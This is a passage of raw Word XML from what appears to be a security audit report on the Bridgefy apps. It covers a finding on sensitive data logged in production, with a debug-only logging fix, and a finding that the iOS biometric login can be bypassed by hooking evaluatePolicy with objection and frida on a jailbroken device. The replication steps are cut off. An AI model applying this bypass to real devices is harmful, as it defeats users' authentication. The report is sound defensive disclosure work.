          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data ${payload.message} - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${data["id"]!!}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>avoid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>approaches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implement this are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Creating a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>log wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, check if the build is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>build there, only log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>debug and verbose messages for a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="377" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Creating ProGuard rules so that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Log.d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Log.v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are removed when the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is for production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The proposed approach keeps debugging features for developers while disabling them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in production releases. Please note this is implemented correctly in the Android SDK, and the fix should be extended to the Android app as well:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="108"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487600640">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>230466</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="40" name="Graphic 40"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="40" name="Graphic 40"/>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8.146997pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15715840;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape30" coordorigin="1440,363" coordsize="2880,0" path="m1440,363l4320,363e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/a/4592958</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/a/2466662</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private val serviceLogLevel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="395"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(BuildConfig.DEBUG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HttpLoggingInterceptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Level.BODY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HttpLoggingInterceptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Level.NONE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="32"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250041" w:id="14"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-036</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Biometric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. Bridgefy iOS 1.0.0 build 274 was found to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the iOS app biometric login implementation is currently vulnerable to instrumentation attacks due to usage of weak iOS keychain permissions. Specifically, there is no proper access control when using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>LAContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> class. A malicious attacker, with access to an unlocked jailbroken device, could leverage this weakness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to bypass the intended biometric login restrictions by manipulating the response of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>evaluatePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> method and always return a success status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>objection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>jailbroken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>frida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>replicated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>already,</w:t>
      </w:r>
